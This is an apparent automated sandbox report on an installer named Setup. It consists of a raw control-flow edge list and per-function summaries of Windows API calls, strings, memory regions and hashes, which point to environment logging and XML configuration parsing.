639577da 80990->80991 81020 6394e389 GetParent PostMessageW 80991->81020 80993 639576a1 80993->80956 81021 6397265b 80994->81021 80996 6395fb5b GetParent SendMessageW 80997 6395fb95 80996->80997 80998 6395fb8a 80996->80998 81000 6395fba9 80997->81000 81023 6395ea8d 98 API calls ctype 80997->81023 81022 6395ea8d 98 API calls ctype 80998->81022 81002 6395fbc7 81000->81002 81003 6395fbb2 GetParent SendMessageW 81000->81003 81004 6395fbd0 GetParent SendMessageW 81002->81004 81005 6395fbe5 _receive_impl ctype 81002->81005 81003->81002 81004->81005 81005->80963 81006->80938 81007->80943 81008->80954 81009->80957 81010->80944 81012 6394f266 81011->81012 81013 6394f2a2 ShowWindow 81012->81013 81016 6394f26a SetWindowTextW ShowWindow 81012->81016 81014 6394f2ad KiUserCallbackDispatcher 81013->81014 81014->80971 81017 6394f29c 81016->81017 81017->81014 81018->80986 81019->80986 81020->80993 81021->80996 81022->80997 81023->81000 81024 6395df19 81031 6395ca5a 81024->81031 81028 6395df6c GetExitCodeThread CloseHandle 81037 6395cb21 74 API calls 4 library calls 81028->81037 81030 6395df9b 81038 639509a7 LoadLibraryW 81031->81038 81033 6395ca98 81039 639565d7 InitCommonControlsEx 81033->81039 81035 6395cb14 CreateThread 81036 639603f5 MsgWaitForMultipleObjects PeekMessageW TranslateMessage DispatchMessageW PeekMessageW 81035->81036 81040 6395dfab 8 API calls 81035->81040 81036->81028 81037->81030 81038->81033 81039->81035 81041 6c90ff5c EnterCriticalSection 81042 6c9108fc LeaveCriticalSection 81041->81042 81043 6c90ffae 81041->81043 81044 6c8c4cb2 112 API calls 81043->81044 81045 6c90ffbb 81044->81045 81046 6c8f833e ctype 110 API calls 81045->81046 81047 6c90ffd3 81046->81047 81048 6c8f8cd5 ctype 101 API calls 81047->81048 81049 6c90ffee 81048->81049 81050 6c8c391d 110 API calls 81049->81050 81057 6c910017 81050->81057 81051 6c91009e 81052 6c91c0aa ctype 77 API calls 81051->81052 81053 6c9100a5 81052->81053 81056 6c91c0aa ctype 77 API calls 81053->81056 81054 6c91c0aa ctype 77 
API calls 81054->81057 81055 6c8e24cd 111 API calls 81055->81057 81059 6c9100d6 81056->81059 81057->81051 81057->81054 81057->81055 81095 6c912306 81057->81095 81115 6c8fbc6d 71 API calls 2 library calls 81057->81115 81099 6c912480 81059->81099 81062 6c9108a0 81063 6c90657a ctype 67 API calls 81062->81063 81065 6c9108b1 81063->81065 81064 6c918e54 ctype KiUserExceptionDispatcher 81081 6c910133 81064->81081 81107 6c9124d1 81065->81107 81067 6c8e24cd 111 API calls 81067->81081 81069 6c8c395e ctype 101 API calls 81070 6c9108d8 81069->81070 81071 6c918f0e ctype RtlFreeHeap 81070->81071 81072 6c9108e4 81071->81072 81074 6c918f0e ctype RtlFreeHeap 81072->81074 81073 6c9268b5 67 API calls ctype 81073->81081 81075 6c9108f0 81074->81075 81076 6c918f0e ctype RtlFreeHeap 81075->81076 81076->81042 81078 6c8fbc09 CloseHandle ctype 81078->81081 81079 6c910924 81120 6c9178c8 RaiseException 81079->81120 81081->81062 81081->81064 81081->81067 81081->81073 81081->81078 81081->81079 81083 6c914ee6 71 API calls 81081->81083 81084 6c8d6cb7 110 API calls 81081->81084 81085 6c8c3834 76 API calls 81081->81085 81086 6c914c0c 175 API calls 81081->81086 81089 6c912306 175 API calls 81081->81089 81090 6c918eab 67 API calls ctype 81081->81090 81092 6c8f84b9 101 API calls ctype 81081->81092 81093 6c918f0e RtlFreeHeap ctype 81081->81093 81094 6c8f9067 ctype 71 API calls 81081->81094 81116 6c8f8f9e 71 API calls ctype 81081->81116 81117 6c8f902f KiUserExceptionDispatcher ctype 81081->81117 81118 6c8df454 115 API calls 4 library calls 81081->81118 81119 6c8dd25c 111 API calls 4 library calls 81081->81119 81082 6c910929 81083->81081 81084->81081 81085->81081 81086->81081 81089->81081 81090->81081 81092->81081 81093->81081 81094->81081 81096 6c912312 __EH_prolog3 81095->81096 81121 6c914c71 81096->81121 81098 6c912356 ctype 81098->81057 81101 6c912489 81099->81101 81106 6c9124b3 81099->81106 81100 6c9124a9 81103 6c91be0e _free 66 API calls 81100->81103 81101->81100 81105 6c918f0e ctype RtlFreeHeap 
81101->81105 81102 6c91be0e _free 66 API calls 81104 6c9124c3 81102->81104 81103->81106 81104->81081 81105->81101 81106->81102 81106->81104 81374 6c91236b 81107->81374 81111 6c9108bf 81111->81069 81112 6c8e24cd 111 API calls 81114 6c9124ee 81112->81114 81113 6c91be92 70 API calls __recalloc 81113->81114 81114->81111 81114->81112 81114->81113 81115->81057 81116->81081 81117->81081 81118->81081 81119->81081 81120->81082 81122 6c914cc1 81121->81122 81135 6c914c88 81121->81135 81123 6c914cc6 81122->81123 81124 6c914cdd 81122->81124 81207 6c915748 175 API calls ctype 81123->81207 81128 6c914ce2 81124->81128 81129 6c914cf9 81124->81129 81125 6c914cbf 81126 6c914d29 81125->81126 81209 6c9155d7 175 API calls ctype 81125->81209 81126->81098 81208 6c915668 175 API calls ctype 81128->81208 81136 6c91537a 81129->81136 81133 6c914c71 175 API calls 81133->81135 81135->81125 81135->81133 81206 6c8dd25c 111 API calls 4 library calls 81135->81206 81137 6c915386 __EH_prolog3 81136->81137 81138 6c8f833e ctype 110 API calls 81137->81138 81139 6c915394 81138->81139 81140 6c9268b5 ctype 67 API calls 81139->81140 81141 6c9153ae 81140->81141 81142 6c9268b5 ctype 67 API calls 81141->81142 81143 6c9153c3 81142->81143 81144 6c915414 81143->81144 81145 6c9153cd 81143->81145 81147 6c91543b 81144->81147 81249 6c8e0b24 67 API calls ctype 81144->81249 81146 6c8d6cb7 110 API calls 81145->81146 81148 6c9153d8 81146->81148 81149 6c9268b5 ctype 67 API calls 81147->81149 81151 6c918eab ctype 67 API calls 81148->81151 81152 6c91544d 81149->81152 81154 6c9153e6 81151->81154 81155 6c915412 81152->81155 81159 6c8f84b9 ctype 101 API calls 81152->81159 81153 6c915420 81156 6c8f84b9 ctype 101 API calls 81153->81156 81158 6c8f84b9 ctype 101 API calls 81154->81158 81160 6c8f8cd5 ctype 101 API calls 81155->81160 81157 6c91542c 81156->81157 81161 6c918f0e ctype RtlFreeHeap 81157->81161 81162 6c9153fb 81158->81162 81159->81155 81163 6c915473 81160->81163 81161->81147 81164 6c918f0e ctype RtlFreeHeap 81162->81164 
81165 6c8f8cd5 ctype 101 API calls 81163->81165 81166 6c915403 81164->81166 81167 6c915481 81165->81167 81168 6c918f0e ctype RtlFreeHeap 81166->81168 81169 6c8c391d 110 API calls 81167->81169 81168->81155 81170 6c91549d 81169->81170 81171 6c918f0e ctype RtlFreeHeap 81170->81171 81172 6c9154ac 81171->81172 81173 6c9155b8 81172->81173 81174 6c9268b5 ctype 67 API calls 81172->81174 81215 6c9159f8 81173->81215 81177 6c9154ca 81174->81177 81176 6c91558c 81179 6c8c395e ctype 101 API calls 81176->81179 81182 6c9154df 81177->81182 81210 6c915b5d 81177->81210 81181 6c91559b 81179->81181 81184 6c918f0e ctype RtlFreeHeap 81181->81184 81188 6c8fff21 ctype 101 API calls 81182->81188 81183 6c915539 81185 6c915540 81183->81185 81186 6c91554a 81183->81186 81187 6c9155a6 81184->81187 81250 6c8e0b4a 119 API calls 3 library calls 81185->81250 81190 6c9268b5 ctype 67 API calls 81186->81190 81191 6c918f0e ctype RtlFreeHeap 81187->81191 81193 6c9154ee 81188->81193 81194 6c91555a 81190->81194 81200 6c915511 ctype 81191->81200 81192 6c915548 81197 6c90657a ctype 67 API calls 81192->81197 81195 6c8c395e ctype 101 API calls 81193->81195 81194->81173 81251 6c8e17a5 72 API calls 81194->81251 81198 6c9154fb 81195->81198 81199 6c915579 81197->81199 81201 6c918f0e ctype RtlFreeHeap 81198->81201 81199->81173 81202 6c91557d 81199->81202 81200->81125 81203 6c915506 81201->81203 81204 6c8fff21 ctype 101 API calls 81202->81204 81205 6c918f0e ctype RtlFreeHeap 81203->81205 81204->81176 81205->81200 81206->81135 81207->81125 81208->81125 81209->81126 81211 6c9268b5 ctype 67 API calls 81210->81211 81212 6c915b7b 81211->81212 81213 6c9268b5 ctype 67 API calls 81212->81213 81214 6c915529 81212->81214 81213->81214 81214->81182 81214->81183 81216 6c915a04 __EH_prolog3 81215->81216 81217 6c9268b5 ctype 67 API calls 81216->81217 81218 6c915a19 81217->81218 81219 6c915a2a 81218->81219 81220 6c9268b5 ctype 67 API calls 81218->81220 81221 6c8fff21 ctype 101 API calls 81219->81221 81222 6c915a52 GetCommandLineW 
81220->81222 81227 6c915a39 ctype 81221->81227 81224 6c8c3e77 ctype 114 API calls 81222->81224 81225 6c915a74 81224->81225 81226 6c8c4486 ctype 112 API calls 81225->81226 81228 6c915a82 81226->81228 81227->81176 81252 6c912b01 81228->81252 81231 6c918f0e ctype RtlFreeHeap 81232 6c915aaa 81231->81232 81233 6c8c41a9 ctype 67 API calls 81232->81233 81234 6c915ab6 81233->81234 81235 6c915af6 81234->81235 81236 6c915abb 81234->81236 81368 6c915be8 68 API calls ctype 81235->81368 81236->81219 81241 6c915ad7 81236->81241 81238 6c915afc 81239 6c915b00 81238->81239 81240 6c915b13 81238->81240 81242 6c8fff21 ctype 101 API calls 81239->81242 81243 6c8f833e ctype 110 API calls 81240->81243 81244 6c8fff21 ctype 101 API calls 81241->81244 81242->81227 81245 6c915b21 81243->81245 81244->81227 81246 6c8fff21 ctype 101 API calls 81245->81246 81247 6c915b37 81246->81247 81248 6c918f0e ctype RtlFreeHeap 81247->81248 81248->81227 81249->81153 81250->81192 81251->81192 81253 6c912b3f 81252->81253 81293 6c912b38 81252->81293 81254 6c9268b5 ctype 67 API calls 81253->81254 81255 6c912b52 81254->81255 81256 6c9268b5 ctype 67 API calls 81255->81256 81255->81293 81257 6c912b6e 81256->81257 81258 6c9268b5 ctype 67 API calls 81257->81258 81257->81293 81259 6c912b83 81258->81259 81260 6c9268b5 ctype 67 API calls 81259->81260 81259->81293 81261 6c912b9c 81260->81261 81262 6c912bc4 GetCommandLineW 81261->81262 81278 6c912bee 81261->81278 81261->81293 81263 6c8c3e77 ctype 114 API calls 81262->81263 81264 6c912bd5 81263->81264 81369 6c8c423c 111 API calls ctype 81264->81369 81265 6c912c06 81267 6c8d6cb7 110 API calls 81265->81267 81270 6c912c14 PathFileExistsW 81267->81270 81268 6c912f1c 81271 6c8d6cb7 110 API calls 81268->81271 81269 6c912bde 81273 6c8c41a9 ctype 67 API calls 81269->81273 81274 6c918f0e ctype RtlFreeHeap 81270->81274 81275 6c912f2a 81271->81275 81272 6c912dad 81272->81268 81276 6c912df5 GetModuleFileNameW 81272->81276 81277 6c912dab 81272->81277 81273->81278 81279 6c912c28 
81274->81279 81280 6c918eab ctype 67 API calls 81275->81280 81282 6c918afc ctype KiUserExceptionDispatcher 81276->81282 81277->81272 81281 6c918d3a ctype 70 API calls 81277->81281 81278->81265 81278->81272 81278->81293 81279->81272 81286 6c9268b5 ctype 67 API calls 81279->81286 81283 6c912f3a PathFileExistsW 81280->81283 81284 6c912df1 81281->81284 81285 6c912e0b 81282->81285 81287 6c918f0e ctype RtlFreeHeap 81283->81287 81284->81276 81289 6c8f833e ctype 110 API calls 81285->81289 81290 6c912c42 81286->81290 81288 6c912f51 81287->81288 81291 6c918f0e ctype RtlFreeHeap 81288->81291 81292 6c912e16 81289->81292 81290->81272 81295 6c8d6cb7 110 API calls 81290->81295 81291->81293 81294 6c8f8f73 ctype 71 API calls 81292->81294 81293->81231 81297 6c912e24 81294->81297 81296 6c912c5d 81295->81296 81370 6c8d6cd8 110 API calls ctype 81296->81370 81299 6c918eab ctype 67 API calls 81297->81299 81301 6c912e30 81299->81301 81300 6c912c73 81302 6c918eab ctype 67 API calls 81300->81302 81303 6c8f84b9 ctype 101 API calls 81301->81303 81304 6c912c82 81302->81304 81305 6c912e49 81303->81305 81306 6c918f0e ctype RtlFreeHeap 81304->81306 81307 6c918f0e ctype RtlFreeHeap 81305->81307 81309 6c912c9a 81306->81309 81308 6c912e56 81307->81308 81310 6c8d6cb7 110 API calls 81308->81310 81311 6c8e2d73 67 API calls 81309->81311 81312 6c912e64 81310->81312 81313 6c912ca5 81311->81313 81314 6c918eab ctype 67 API calls 81312->81314 81371 6c8e816f 67 API calls ctype 81313->81371 81316 6c912e73 81314->81316 81318 6c918f0e ctype RtlFreeHeap 81316->81318 81317 6c912cc9 81319 6c918f0e ctype RtlFreeHeap 81317->81319 81320 6c912e8b 81318->81320 81321 6c912cda 81319->81321 81322 6c8f89f0 ctype 67 API calls 81320->81322 81372 6c8e81ac 156 API calls 2 library calls 81321->81372 81324 6c912e9c 81322->81324 81326 6c8f84b9 ctype 101 API calls 81324->81326 81325 6c912ce1 81327 6c912d25 81325->81327 81328 6c912ce5 81325->81328 81332 6c912eaa 81326->81332 81330 6c912d6d 81327->81330 81331 6c912d2f 81327->81331 

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6C900C9B
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,0000029C,6C8FA587,?,6C8BA794,?,02F92298,?,00000000,?,Failed to record current state name), ref: 6C900CAD
                                                                                              • GetLastError.KERNEL32(?,Failed to record OSFullBuildNumber), ref: 6C900CCC
                                                                                                • Part of subcall function 6C901236: __EH_prolog3.LIBCMT ref: 6C90123D
                                                                                              • GetNativeSystemInfo.KERNEL32(?), ref: 6C900D21
                                                                                              • GetLastError.KERNEL32(?,00000000,?,Failed to record OSFullBuildNumber,000001C5,00000000), ref: 6C900DB2
                                                                                              • GetLastError.KERNEL32(?,00000000,?,Failed to record OSAbbr,?,00000000,?,Failed to record OSFullBuildNumber,000001C5,00000000), ref: 6C900E38
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$H_prolog3$H_prolog3_HandleInfoModuleNativeSystem
                                                                                              • String ID: Failed to record OSAbbr$Failed to record OSComplete$Failed to record OSFullBuildNumber$Failed to record OsSpLevel$Failed to record SystemLocale$Failed to record WindowsInstallerVersion$GetNativeSystemInfo$kernel32.dll
                                                                                              • API String ID: 684166175-3561000745
                                                                                              • Opcode ID: 3bbb068833b15243b4e82454f118f7927e27fa42899b983bf0118e86805f0f12
                                                                                              • Instruction ID: c218f9e121144f35bbb4e008898a92f9c319b5007b3c115dd52e94b4ce01e9e3
                                                                                              • Opcode Fuzzy Hash: 3bbb068833b15243b4e82454f118f7927e27fa42899b983bf0118e86805f0f12
                                                                                              • Instruction Fuzzy Hash: 7EA1C831A00259AFDB20DBA4CE09BDDB7B9AF9530CF1045D8E004E7B41DB74EA89DB65
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8F76AE
                                                                                                • Part of subcall function 6C91C0AA: _malloc.LIBCMT ref: 6C91C0C4
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,00000020,6C8FF845,?), ref: 6C8F7748
                                                                                              • GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 6C8F7758
                                                                                              • SetThreadStackGuarantee.KERNEL32(00020000), ref: 6C8F776D
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(6C90416A), ref: 6C8F7774
                                                                                              • GetCommandLineW.KERNEL32 ref: 6C8F777A
                                                                                                • Part of subcall function 6C8C7C6E: __EH_prolog3.LIBCMT ref: 6C8C7C75
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$AddressCommandExceptionFilterGuaranteeHandleLineModuleProcStackThreadUnhandled_malloc
                                                                                              • String ID: SetThreadStackGuarantee$kernel32.dll$passive
                                                                                              • API String ID: 4088884676-825548933
                                                                                              • Opcode ID: 3cead472af1c5963832205292b00c165239845dbc5e9ec00099a8ea4bb333688
                                                                                              • Instruction ID: 349ebb142b5ab70b752ebd4b4f83630bfc46fc6692f2cd67fb088f472805b917
                                                                                              • Opcode Fuzzy Hash: 3cead472af1c5963832205292b00c165239845dbc5e9ec00099a8ea4bb333688
                                                                                              • Instruction Fuzzy Hash: 69418DB1915344CEDB20CFA9C6856DABBF4BB16308F604C7EC0599BB01C734D549CB65
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6C8F7B4A
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                              • GetCommandLineW.KERNEL32 ref: 6C8F7BB4
                                                                                              • _memset.LIBCMT ref: 6C8F7BF4
                                                                                              • GetTimeZoneInformation.KERNEL32(?), ref: 6C8F7C03
                                                                                              • GetThreadLocale.KERNEL32(00000007,?), ref: 6C8F7C3F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CommandH_prolog3H_prolog3_InformationLineLocaleThreadTimeZone_memset
                                                                                              • String ID: CommandLine = %s$Environment details$Initial LCID = %u$TimeZone = %s
                                                                                              • API String ID: 1050886296-4009495903
                                                                                              • Opcode ID: 61dff1d97b2f10643739edaf09a9069971ae7fa2e23e01d149bc00adf330dd36
                                                                                              • Instruction ID: b5bf8f223c56f83494ccb165e8c8c0e64fb753a81fead3eda96462aeae8dea8b
                                                                                              • Opcode Fuzzy Hash: 61dff1d97b2f10643739edaf09a9069971ae7fa2e23e01d149bc00adf330dd36
                                                                                              • Instruction Fuzzy Hash: 5C316B71900218EBEB20DBA4CD49FCDBBB9BF15304F154999E108E7A90DB74DA49CB51
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6394DC06
                                                                                                • Part of subcall function 6394D923: __EH_prolog3.LIBCMT ref: 6394D92A
                                                                                                • Part of subcall function 6394D923: PathIsRelativeW.SHLWAPI(00000000,00000000,?,00000000,00000008,6395E271,00000000,?,?,00000DF0,?,?), ref: 6394D960
                                                                                                • Part of subcall function 6394D923: GetModuleFileNameW.KERNEL32(00000010,00000104,?,00000000,00000008,6395E271,00000000,?,?,00000DF0,?,?), ref: 6394D9BA
                                                                                                • Part of subcall function 6394D923: PathCombineW.SHLWAPI(?,?,?,00000000,?,00000000,00000008,6395E271,00000000,?,?,00000DF0,?,?), ref: 6394DA0D
                                                                                              • CoCreateInstance.OLE32(63947930,00000000,00000017,63947970,?,?,?,?,00000030,639562D8), ref: 6394DC48
                                                                                              • SysFreeString.OLEAUT32(?), ref: 6394DC69
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 6394DE1D: __EH_prolog3.LIBCMT ref: 6394DE24
                                                                                                • Part of subcall function 6394DE1D: SysFreeString.OLEAUT32(00000000), ref: 6394DE6B
                                                                                                • Part of subcall function 6394CA39: __EH_prolog3.LIBCMT ref: 6394CA40
                                                                                                • Part of subcall function 6394CAC2: __EH_prolog3.LIBCMT ref: 6394CAC9
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6394DD4B
                                                                                              • SysFreeString.OLEAUT32(?), ref: 6394DD87
                                                                                                • Part of subcall function 6394B93E: __EH_prolog3.LIBCMT ref: 6394B945
                                                                                              Strings
                                                                                              • m_spDoc->get_documentElement() failed. Parse error is: %s, xrefs: 6394DD19
                                                                                              • m_spDoc->loadXML() failed. Parse error is: %s, xrefs: 6394DDFE
                                                                                              • CoCreateInstance(__uuidof(DOMDocument30)) failed with hr=%d, xrefs: 6394DC58
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$FreeString$Path$CombineCreateException@8FileInstanceModuleNameRelativeThrow
                                                                                              • String ID: CoCreateInstance(__uuidof(DOMDocument30)) failed with hr=%d$m_spDoc->get_documentElement() failed. Parse error is: %s$m_spDoc->loadXML() failed. Parse error is: %s
                                                                                              • API String ID: 3627190661-2525052916
                                                                                              • Opcode ID: a5a8a47722aa409837923eeabf071edee7c04f837b89776d56d388ed18a27541
                                                                                              • Instruction ID: dd424bd96baef7788ea09933711363b3bd29733109cb65f563ed59ae1626d5c8
                                                                                              • Opcode Fuzzy Hash: a5a8a47722aa409837923eeabf071edee7c04f837b89776d56d388ed18a27541
                                                                                              • Instruction Fuzzy Hash: A3616272900209EFDB00DFE8CD84AEEB7B8AF19708F144559F161A7292D735DA45CF61
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6C8D5B8C
                                                                                              • _memset.LIBCMT ref: 6C8D5BBB
                                                                                                • Part of subcall function 6C8F8E4A: PathAppendW.SHLWAPI(00000000,?,?,?,?,?,6C9099FD,00000000,00000000,?,?,?,00000000,?,UiInfo.xml), ref: 6C8F8E6E
                                                                                              • FindFirstFileW.KERNEL32(?,?,????), ref: 6C8D5BDA
                                                                                              • FindNextFileW.KERNELBASE(?,?), ref: 6C8D5CA8
                                                                                              • FindClose.KERNEL32(?), ref: 6C8D5CC1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$File$AppendCloseFirstH_prolog3_NextPath_memset
                                                                                              • String ID: ????
                                                                                              • API String ID: 2365859831-1216582215
                                                                                              • Opcode ID: 2c8515125e8572b53125d09b6559a0fb869ee941454d42691dc887ee4e17a4f5
                                                                                              • Instruction ID: 877da4c78e35d0d11ffd8355cd8a1817bdaf8467a019cb7525e01364510bb0ba
                                                                                              • Opcode Fuzzy Hash: 2c8515125e8572b53125d09b6559a0fb869ee941454d42691dc887ee4e17a4f5
                                                                                              • Instruction Fuzzy Hash: F231D271808219DADF20AFA4CD8DBDE73B8AF10359F114AA6E445D6A90DB35DA89CB10

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
6c90c6cc-6c90c6e8 call 6c8c420c 497->509 508->509 515 6c90c6c2-6c90c6c9 508->515 521 6c90c713-6c90c740 call 6c8f7a92 call 6c8e2d50 509->521 522 6c90c6ea-6c90c6f8 509->522 515->509 534 6c90c742-6c90c750 call 6c9163d7 521->534 535 6c90c755-6c90c8ec call 6c918f0e call 6c8e7148 call 6c8e7773 * 2 call 6c8e7292 call 6c918f0e * 2 call 6c8e7292 call 6c90e49e call 6c90d985 call 6c918f0e * 3 CloseHandle call 6c918f0e * 2 call 6c8e6f61 call 6c8fbe94 call 6c918f0e * 2 call 6c8f5a5a call 6c8e43ed call 6c8c41a9 call 6c8d5b32 call 6c90d6d1 521->535 525 6c90c6fa-6c90c6fd 522->525 526 6c90c6ff-6c90c70d 522->526 525->521 525->526 526->521 534->535
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6C90B39A
                                                                                                • Part of subcall function 6C90D446: __EH_prolog3_catch.LIBCMT ref: 6C90D44D
                                                                                                • Part of subcall function 6C90D446: GetCommandLineW.KERNEL32(0000006C,6C90B3B6,?,00000738,6C8FFA6E,?,6C8BA794,02F92298), ref: 6C90D48E
                                                                                                • Part of subcall function 6C90D446: CoInitialize.OLE32(00000000), ref: 6C90D4EF
                                                                                                • Part of subcall function 6C90D713: CreateThread.KERNEL32(00000000,00000000,6C9123E8,?,00000000,00000000), ref: 6C90D729
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C90988C: __EH_prolog3.LIBCMT ref: 6C909893
                                                                                                • Part of subcall function 6C90988C: GetCommandLineW.KERNEL32(0000002C,6C90D52A,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C9098B4
                                                                                                • Part of subcall function 6C90988C: PathIsRelativeW.SHLWAPI(?,?,?,00000000,?,UiInfo.xml,?,?,00000000,?), ref: 6C90996E
                                                                                                • Part of subcall function 6C8F4E70: __EH_prolog3.LIBCMT ref: 6C8F4E77
                                                                                                • Part of subcall function 6C8F4E70: __CxxThrowException@8.LIBCMT ref: 6C8F4F68
                                                                                                • Part of subcall function 6C8F4E70: ReadFile.KERNEL32(?,?,00000002,?,00000000,?,80000000,00000001,00000003,00000080,00000000,?,?,?,?,0000002C), ref: 6C8F4F7E
                                                                                                • Part of subcall function 6C8F4E70: CloseHandle.KERNEL32(?), ref: 6C8F4FA1
                                                                                                • Part of subcall function 6C8CA8CC: __EH_prolog3.LIBCMT ref: 6C8CA8D3
                                                                                                • Part of subcall function 6C8CA8CC: PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C8CA90B
                                                                                                • Part of subcall function 6C8CA8CC: GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C8CA964
                                                                                                • Part of subcall function 6C8CA8CC: __CxxThrowException@8.LIBCMT ref: 6C8CAA28
                                                                                                • Part of subcall function 6C8F5033: __EH_prolog3.LIBCMT ref: 6C8F503A
                                                                                                • Part of subcall function 6C8F5033: __CxxThrowException@8.LIBCMT ref: 6C8F50B6
                                                                                                • Part of subcall function 6C8F51C0: __EH_prolog3_catch.LIBCMT ref: 6C8F51C7
                                                                                                • Part of subcall function 6C8F51C0: CoInitialize.OLE32(00000000), ref: 6C8F51DC
                                                                                              • SysFreeString.OLEAUT32(?), ref: 6C90B471
                                                                                                • Part of subcall function 6C90D01E: __EH_prolog3.LIBCMT ref: 6C90D025
                                                                                                • Part of subcall function 6C90D01E: PathFileExistsW.SHLWAPI(?,6C8B61FC,graphics,?,00000054,6C90B48A,?,?,?,?,ParameterInfo.xml,?,00000000,?,?,ParameterInfo.xml), ref: 6C90D0BE
                                                                                                • Part of subcall function 6C8D59B8: __EH_prolog3.LIBCMT ref: 6C8D59BF
                                                                                                • Part of subcall function 6C8D6083: __EH_prolog3_catch.LIBCMT ref: 6C8D608A
